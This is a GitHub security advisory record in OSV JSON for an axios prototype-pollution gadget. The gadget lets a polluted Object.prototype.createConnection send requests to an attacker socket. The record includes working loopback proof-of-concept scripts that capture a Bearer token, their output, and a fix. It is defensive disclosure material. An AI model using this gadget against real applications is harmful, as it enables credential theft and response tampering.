{"id":"GHSA-m8m8-qj5v-23w3","summary":"Axios: Node HTTP adapter prototype-pollution gadget allows request socket hijack via inherited createConnection","details":"## Summary\n\nAxios' Node HTTP adapter can act as a read-side prototype-pollution gadget for Node's sensitive `createConnection` request option. The adapter creates a null-prototype options object, but Node's HTTP client can copy or normalize request options into ordinary objects before connection creation. If `Object.prototype.createConnection` has been polluted elsewhere in the same process, Node can call the inherited function and create a socket to an attacker-controlled endpoint.\n\nAxios does not create the prototype pollution source. The vulnerability is that axios does not set an own safe value for a sensitive transport option before handing options to Node.\n\n## Impact\n\nGiven a prior same-process prototype-pollution primitive, an attacker can redirect later axios Node HTTP requests at the socket layer while the request URL and axios config still appear to target the legitimate origin. The attacker-controlled endpoint can receive request headers and bodies, including Authorization headers, cookies, API keys, and service credentials, and can return attacker-controlled responses to the application.\n\nThis can bypass application destination validation that checks the URL before calling axios, because the URL remains legitimate while the underlying socket goes elsewhere.\n\n## Affected Functionality\n\nAffected:\n\n- Node.js HTTP adapter.\n- HTTP and HTTPS request paths that rely on Node/follow-redirects option processing and do not set an own safe `createConnection`.\n- Processes where `Object.prototype.createConnection` is polluted.\n\nNot affected:\n\n- Browser adapters.\n- Processes without prototype pollution.\n- Requests using a custom trusted transport that ignores inherited `createConnection` and sanitizes options internally.\n\n## Technical Details\n\n`lib/adapters/http.js` creates:\n\n```js\nconst options = Object.assign(Object.create(null), {\n  path,\n  method,\n  headers,\n  agents: { http: httpAgent, https: httpsAgent },\n  auth,\n  protocol,\n  family,\n  beforeRedirect: dispatchBeforeRedirect,\n  beforeRedirects: Object.create(null),\n  http2Options,\n});\n```\n\nThe object does not include an own `createConnection` property. Local verification on axios `1.18.1` polluted `Object.prototype.createConnection` to connect to an attacker loopback server. A request to a legitimate loopback server with an Authorization header returned the attacker's response; the legitimate server received no request and the attacker server received `Bearer SECRET`.\n\n## Proof of Concept of Attack\n\nConstrained local demonstration:\n\n```js\nObject.prototype.createConnection = function (_options, cb) {\n  const socket = net.createConnection({ host: '127.0.0.1', port: attackerPort }, () =\u003e {\n    if (typeof cb === 'function') cb(null, socket);\n  });\n  return socket;\n};\n\nawait axios.get('http://127.0.0.1:\u003clegit-port\u003e/secret', {\n  headers: { Authorization: 'Bearer SECRET' },\n  proxy: false\n});\n```\n\nExpected safe behavior is that the legitimate server receives the request. Current affected behavior lets the attacker server receive the request and return the response.\n\n## Workarounds\n\nRun axios in a process where prototype pollution is not present. For high-risk internal clients, use a custom trusted transport or agent layer that sets and enforces its own connection creation behavior instead of allowing inherited Node request options to participate.\n\n\u003cdetails\u003e\n  \u003csummary\u003e\u003ch3\u003eOriginal report\u003c/h3\u003e\u003c/summary\u003e\n  \n## Summary\n\nAxios' Node HTTP adapter remains exploitable as a read-side prototype-pollution gadget after the recent null-prototype hardening. This is not a claim that axios creates the prototype pollution source. The precondition is a separate upstream prototype pollution primitive in the same Node.js process.\n\nWhen `Object.prototype.createConnection` is polluted, axios requests can be redirected to an attacker-controlled socket even though the adapter builds the request options with `Object.create(null)`. The request URL and axios config still appear to target the legitimate host, but the actual socket is attacker-controlled.\n\nThis allows credential exfiltration and response manipulation for later axios HTTP requests in a polluted process.\n\n## Impact\n\nGiven an upstream prototype pollution primitive in the same process, an attacker can turn later axios HTTP requests into a man-in-the-middle primitive:\n\n- redirect the underlying socket for axios requests to attacker-controlled infrastructure\n- receive headers and request bodies intended for the legitimate target, including bearer tokens, cookies, API keys, and service credentials\n- return attacker-controlled responses to the caller\n- bypass application SSRF controls that validate the URL before calling axios, because the requested URL remains legitimate while the socket connects elsewhere\n\nThe important boundary here is axios' documented/read-side prototype-pollution hardening. The project threat model discusses polluted `Object.prototype` from transitive dependencies as an in-scope read-side gadget class where axios should avoid picking up inherited behavior-changing properties. This issue is a bypass of that hardening at the Node HTTP request-options boundary.\n\n## Technical details\n\nThe HTTP adapter constructs a null-prototype request options object before calling the selected transport:\n\n```js\nconst options = Object.assign(Object.create(null), {\n  path,\n  method: method,\n  headers: toByteStringHeaderObject(headers),\n  agents: { http: config.httpAgent, https: config.httpsAgent },\n  auth,\n  protocol,\n  family,\n  beforeRedirect: dispatchBeforeRedirect,\n  beforeRedirects: Object.create(null),\n  http2Options,\n});\n```\n\nThat prevents direct inherited reads while the options object remains null-prototype. However, Node's HTTP client path copies or normalizes request options into ordinary objects before connection creation. After that copy, missing properties can resolve from `Object.prototype` again.\n\n`createConnection` is a sensitive Node HTTP option. If it is inherited after this copy, Node calls the attacker-supplied function to create the socket.\n\n## Reproduction\n\nThe following minimal proof uses a legitimate target server and an attacker server. It pollutes `Object.prototype.createConnection`, then makes an axios request to the legitimate server with an Authorization header.\n\n```js\nimport net from 'node:net';\nimport http from 'node:http';\nimport axios from 'axios';\n\nfunction listen(handler) {\n  return new Promise(resolve =\u003e {\n    const s = http.createServer(handler);\n    s.listen(0, '127.0.0.1', () =\u003e resolve(s));\n  });\n}\n\nconst legitHits = [];\nconst attackerHits = [];\n\nconst legit = await listen((req, res) =\u003e {\n  legitHits.push({url: req.url, auth: req.headers.authorization || null});\n  res.end('LEGIT');\n});\n\nconst attacker = await listen((req, res) =\u003e {\n  attackerHits.push({url: req.url, auth: req.headers.authorization || null});\n  res.end('ATTACKER');\n});\n\nObject.prototype.createConnection = function(options, cb) {\n  const sock = net.createConnection({\n    host: '127.0.0.1',\n    port: attacker.address().port,\n  }, () =\u003e {\n    if (typeof cb === 'function') cb(null, sock);\n  });\n  return sock;\n};\n\nconst res = await axios.get(`http://127.0.0.1:${legit.address().port}/secret`, {\n  headers: {Authorization: 'Bearer SECRET'},\n  proxy: false,\n});\n\nconsole.log({\n  response: res.data,\n  legitHits,\n  attackerHits,\n});\n```\n\nObserved result on the current npm package:\n\n```json\n{\n  \"response\": \"ATTACKER\",\n  \"legitHits\": [],\n  \"attackerHits\": [\n    {\n      \"url\": \"/secret\",\n      \"auth\": \"Bearer SECRET\"\n    }\n  ]\n}\n```\n\nThe request never reached the intended target. The attacker-controlled server received the Authorization header and supplied the response body returned by axios.\n\n## Versions tested\n\nI reproduced this against:\n\n- axios 1.16.1 from npm\n- axios 1.17.0 from npm\n- current `v1.x` source at commit `a8e4f13aeecc45a3b8fab3ecfd9ddb5d70fb772b`\n\n## Fix validation\n\nAdding an own safe value for `createConnection` to the adapter options object prevents inherited pollution from being observed after Node's option copy:\n\n```js\nconst options = Object.assign(Object.create(null), {\n  path,\n  method: method,\n  headers: toByteStringHeaderObject(headers),\n  agents: { http: config.httpAgent, https: config.httpsAgent },\n  auth,\n  protocol,\n  family,\n  beforeRedirect: dispatchBeforeRedirect,\n  beforeRedirects: Object.create(null),\n  http2Options,\n  createConnection: undefined,\n});\n```\n\nWith that guard in place, the same proof no longer calls the polluted function. The legitimate server receives the request, the attacker server receives nothing, and axios returns the legitimate response.\n\n## Remediation\n\nSet own safe defaults for sensitive Node HTTP request options before calling `transport.request`, at minimum:\n\n```js\ncreateConnection: undefined\n```\n\nI recommend reviewing other sensitive Node HTTP options that may be read after Node copies the request options into a normal object, especially connection/TLS-affecting fields such as `lookup`, `timeout`, `localAddress`, `servername`, `signal`, and related options.\n\u003c/details\u003e\n\n---","aliases":["CVE-2026-101905"],"modified":"2026-09-30T15:46:18.253717573Z","published":"2026-09-30T15:32:51Z","database_specific":{"github_reviewed":true,"github_reviewed_at":"2026-09-30T15:32:51Z","nvd_published_at":"2026-09-28T18:17:18Z","cwe_ids":["CWE-1321","CWE-441"],"severity":"HIGH"},"references":[{"type":"WEB","url":"https://github.com/axios/axios/security/advisories/GHSA-m8m8-qj5v-23w3"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-101905"},{"type":"WEB","url":"https://github.com/axios/axios/pull/11141"},{"type":"WEB","url":"https://github.com/axios/axios/commit/d19040bda7a8be2f82c3c6e1a5bc03917daee39a"},{"type":"PACKAGE","url":"https://github.com/axios/axios"},{"type":"WEB","url":"https://github.com/axios/axios/releases/tag/v1.20.0"}],"affected":[{"package":{"name":"axios","ecosystem":"npm","purl":"pkg:npm/axios"},"ranges":[{"type":"SEMVER","events":[{"introduced":"1.15.2"},{"fixed":"1.20.0"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-m8m8-qj5v-23w3/GHSA-m8m8-qj5v-23w3.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"}]}